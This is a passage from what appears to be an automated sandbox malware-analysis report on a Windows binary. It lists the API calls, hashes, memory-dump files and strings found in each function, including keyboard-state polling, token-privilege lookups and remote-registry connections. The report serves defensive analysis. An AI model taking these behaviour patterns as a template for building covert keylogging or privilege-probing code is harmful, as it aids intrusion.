          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
          • String ID:
          • API String ID: 2170234536-0
          • Opcode ID: c67d3410107feb99bb203c8b84f6477b480f66a96e553cef641b4fd8dddf6b06
          • Instruction ID: 6369f5c3f22445f0d5bf5c4520e4337682cbd46778e63a39b460943b9460954a
          • Opcode Fuzzy Hash: c67d3410107feb99bb203c8b84f6477b480f66a96e553cef641b4fd8dddf6b06
          • Instruction Fuzzy Hash: 26B124716042059FD700CF59D884BAEB7B5FF88308F24856EEA05DB351EB3AD845CB6A
          APIs
          • GetKeyboardState.USER32(?), ref: 00453CE0
          • SetKeyboardState.USER32(?), ref: 00453D3B
          • GetAsyncKeyState.USER32 ref: 00453D5E
          • GetKeyState.USER32(000000A0), ref: 00453D75
          • GetAsyncKeyState.USER32 ref: 00453DA4
          • GetKeyState.USER32(000000A1), ref: 00453DB5
          • GetAsyncKeyState.USER32 ref: 00453DE1
          • GetKeyState.USER32(00000011), ref: 00453DEF
          • GetAsyncKeyState.USER32 ref: 00453E18
          • GetKeyState.USER32(00000012), ref: 00453E26
          • GetAsyncKeyState.USER32 ref: 00453E4F
          • GetKeyState.USER32(0000005B), ref: 00453E5D
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: State$Async$Keyboard
          • String ID:
          • API String ID: 541375521-0
          • Opcode ID: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
          • Instruction ID: 009fbf1908f75ed0a62addf5985db529f64a747a45b1090b1102dc3b9208550d
          • Opcode Fuzzy Hash: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
          • Instruction Fuzzy Hash: BC61DD3190478829FB329F6488057EBBBF45F12346F08459ED9C2162C3D7AC6B4CCB65
          APIs
          • GetDlgItem.USER32(?,00000001), ref: 004357DB
          • GetWindowRect.USER32(00000000,?), ref: 004357ED
          • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
          • GetDlgItem.USER32(?,00000002), ref: 0043586A
          • GetWindowRect.USER32(00000000,?), ref: 0043587C
          • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
          • GetDlgItem.USER32(?,000003E9), ref: 004358DC
          • GetWindowRect.USER32(00000000,?), ref: 004358EE
          • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
          • GetDlgItem.USER32(?,000003EA), ref: 00435941
          • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
          • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Window$ItemMoveRect$Invalidate
          • String ID:
          • API String ID: 3096461208-0
          • Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
          • Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
          • Opcode Fuzzy Hash: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
          • Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54
          APIs
          • GetWindowLongW.USER32(?,000000F0), ref: 004714DC
          • LoadImageW.USER32 ref: 004714F7
          • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
          • DeleteObject.GDI32(?), ref: 0047151E
          • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 0047152C
          • LoadImageW.USER32 ref: 0047156F
          • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
          • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
          • DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 004715CD
          • SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
          • DeleteObject.GDI32(?), ref: 004715EA
          • DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 004715F8
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
          • String ID:
          • API String ID: 3218148540-0
          • Opcode ID: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
          • Instruction ID: 6a50b90733f0312424b7b906018c15bc054940e4c1588362709ca6bab20dc4d5
          • Opcode Fuzzy Hash: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
          • Instruction Fuzzy Hash: D2419231740206ABDB209F69DD49FEB77A8EB84711F10452AFA46E72D0DBB4E805C768
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
          • String ID:
          • API String ID: 136442275-0
          • Opcode ID: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
          • Instruction ID: 55d98b2249b58b9b89d53d2d63704957c70a659fb5fc0040d5683289e7d9fa4f
          • Opcode Fuzzy Hash: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
          • Instruction Fuzzy Hash: C24174B381021C66CB24EB55CC41DEE737DAB98705F0085DEB60963141EA796BC8CFA5
          APIs
          • _wcsncpy.LIBCMT ref: 00467490
          • _wcsncpy.LIBCMT ref: 004674BC
            • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
            • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
          • _wcstok.LIBCMT ref: 004674FF
            • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
          • _wcstok.LIBCMT ref: 004675B2
          • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
          • _wcslen.LIBCMT ref: 00467793
          • _wcscpy.LIBCMT ref: 00467641
            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
          • _wcslen.LIBCMT ref: 004677BD
          • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
            • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
          • String ID: X
          • API String ID: 3104067586-3081909835
          • Opcode ID: b68abb8f803176e9b7dbe847da29e758ec7e9b5067a266dcb368a43c8e18a4a8
          • Instruction ID: 683e1e2944aeccc99b179fad4e52216d38d827d7da526ed866e93360804c4864
          • Opcode Fuzzy Hash: b68abb8f803176e9b7dbe847da29e758ec7e9b5067a266dcb368a43c8e18a4a8
          • Instruction Fuzzy Hash: 69C1C5306083009BD310FF65C985A5FB7E4AF84318F108D2EF559972A2EB78ED45CB9A
          APIs
          • OleInitialize.OLE32(00000000), ref: 0046CBC7
          • CLSIDFromProgID.OLE32(?,?), ref: 0046CBDF
          • CLSIDFromString.OLE32(?,?), ref: 0046CBF1
          • CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
          • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
          • _wcslen.LIBCMT ref: 0046CDB0
          • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
          • CoTaskMemFree.OLE32(?), ref: 0046CE42
          • CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
            • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
            • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
            • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
          Strings
          • NULL Pointer assignment, xrefs: 0046CEA6
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask_wcslen
          • String ID: NULL Pointer assignment
          • API String ID: 440038798-2785691316
          • Opcode ID: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
          • Instruction ID: 7aab634462a7dbcbf958abac95e41bd58996b502d0213671d322085b5631b432
          • Opcode Fuzzy Hash: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
          • Instruction Fuzzy Hash: 74B13FB1D00229AFDB10DFA5CC85FEEB7B8EF48700F10855AF909A7281EB745A45CB95
          APIs
          • GetClassNameW.USER32(?,?,00000400), ref: 00461056
          • GetWindowTextW.USER32 ref: 00461092
          • _wcslen.LIBCMT ref: 004610A3
          • CharUpperBuffW.USER32(?,00000000), ref: 004610B1
          • GetClassNameW.USER32(?,?,00000400), ref: 00461124
          • GetWindowTextW.USER32 ref: 0046115D
          • GetClassNameW.USER32(?,?,00000400), ref: 004611A1
          • GetClassNameW.USER32(?,?,00000400), ref: 004611D9
          • GetWindowRect.USER32(?,?), ref: 00461248
            • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
          • String ID: ThumbnailClass
          • API String ID: 4136854206-1241985126
          • Opcode ID: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
          • Instruction ID: 9bdbaadfe46dce382da1609a4111f175dadd43cf518d3c7fb815d390e9d71813
          • Opcode Fuzzy Hash: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
          • Instruction Fuzzy Hash: D991F3715043009FCB14DF51C881BAB77A8EF89719F08895FFD84A6252E738E946CBA7
          APIs
          • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
          • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
          • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00471960
          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
          • SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
          • GetClientRect.USER32 ref: 00471A1A
          • RedrawWindow.USER32(?,?,00000000,00000000), ref: 00471A29
          • DestroyIcon.USER32(?), ref: 00471AF4
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
          • String ID: 2
          • API String ID: 1331449709-450215437
          • Opcode ID: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
          • Instruction ID: 8a8bfaa361b8e4ad447499ed02e60938d35b352fbee86dd909721fc396438cf5
          • Opcode Fuzzy Hash: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
          • Instruction Fuzzy Hash: 19519070A00209AFDB10CF98CD95BEEB7B5FF49310F10815AEA09AB3A1D7B4AD41CB55
          APIs
          • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
          • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
          • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
          • __swprintf.LIBCMT ref: 00460915
          • __swprintf.LIBCMT ref: 0046092D
          • _wprintf.LIBCMT ref: 004609E1
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: HandleLoadModuleString__swprintf$_memmove_wcslen_wprintf
          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
          • API String ID: 3054410614-2561132961
          • Opcode ID: 525672c6318f03bf5c80d6cc28fa1f1d99bb47d67e8ddb41e80830938e70613e
          • Instruction ID: 8ea7bd36613c7ff98b4c02c5a019b599898316a67ab96f708308d0ed756dbd7a
          • Opcode Fuzzy Hash: 525672c6318f03bf5c80d6cc28fa1f1d99bb47d67e8ddb41e80830938e70613e
          • Instruction Fuzzy Hash: 654183B29001099BDB00FBD1DC9AAEF7778EF44354F45403AF504B7192EB78AA45CBA9
          APIs
            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
          • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
          • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
          • RegOpenKeyExW.ADVAPI32 ref: 0045875C
          • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
          • CLSIDFromString.OLE32(?,?), ref: 004587B3
          • RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
          • RegCloseKey.ADVAPI32(?), ref: 004587C5
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
          • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
          • API String ID: 600699880-22481851
          • Opcode ID: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
          • Instruction ID: 095cb2d92039a6881e8bf561e9cb0619f72fc8c68408713302cc045b8cca0367
          • Opcode Fuzzy Hash: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
          • Instruction Fuzzy Hash: 58415275D0020DABCB04EBA4DC45ADE77B8EF48304F10846EE914B7291EF78A909CB94
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: DestroyWindow
          • String ID: static
          • API String ID: 3375834691-2160076837
          • Opcode ID: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
          • Instruction ID: e571488c54e010bbe3192cf51c39f0d33963e2fa0fa89bc12fd4c8100c345edb
          • Opcode Fuzzy Hash: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
          • Instruction Fuzzy Hash: 2C41B375200205ABDB149F64DC85FEB33A8EF89725F20472AFA15E72C0D7B4E841CB68
          APIs
          • GetCurrentProcess.KERNEL32(00000008,00000000,?), ref: 00436F6A
          • OpenThreadToken.ADVAPI32(00000000), ref: 00436F6D
          • GetCurrentProcess.KERNEL32(00000008,?), ref: 00436F7D
          • OpenProcessToken.ADVAPI32(00000000), ref: 00436F80
          • LookupPrivilegeValueW.ADVAPI32(00000000,SeAssignPrimaryTokenPrivilege,?), ref: 00436FB9
          • LookupPrivilegeValueW.ADVAPI32(00000000,SeIncreaseQuotaPrivilege,?), ref: 00436FD0
          • _memcmp.LIBCMT ref: 00437001
          • CloseHandle.KERNEL32(?), ref: 0043704B
          Strings
          • SeAssignPrimaryTokenPrivilege, xrefs: 00436FB1
          • SeIncreaseQuotaPrivilege, xrefs: 00436FC7
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Process$CurrentLookupOpenPrivilegeTokenValue$CloseHandleThread_memcmp
          • String ID: SeAssignPrimaryTokenPrivilege$SeIncreaseQuotaPrivilege
          • API String ID: 1446985595-805462909
          • Opcode ID: 20e3785b7433241d37dd94a03bfa4397e83b78d22b2bbb476a85e96c63628419
          • Instruction ID: 5d9cc79d75c838d3750a3a1f44766322371bceb9368f6a60d1057fe533f678da
          • Opcode Fuzzy Hash: 20e3785b7433241d37dd94a03bfa4397e83b78d22b2bbb476a85e96c63628419
          • Instruction Fuzzy Hash: 6531BEB2D40209ABDF20DBA1CD44AEFBBB8FB88310F14545BE940A7240D7789A45CFA5
          APIs
          • SetErrorMode.KERNEL32(00000001), ref: 0045D959
          • GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
          • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: ErrorMode$DriveType
          • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
          • API String ID: 2907320926-3566645568
          • Opcode ID: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
          • Instruction ID: 8c6a7395db7573f60177d60b7e789de744ab79b943898383e565048f237880a7
          • Opcode Fuzzy Hash: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
          • Instruction Fuzzy Hash: B7316E35A042049BCB10FFA9C48595EB771FF88315B1088ABFD05AB392C739DD45CB6A
          APIs
            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BF8D
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
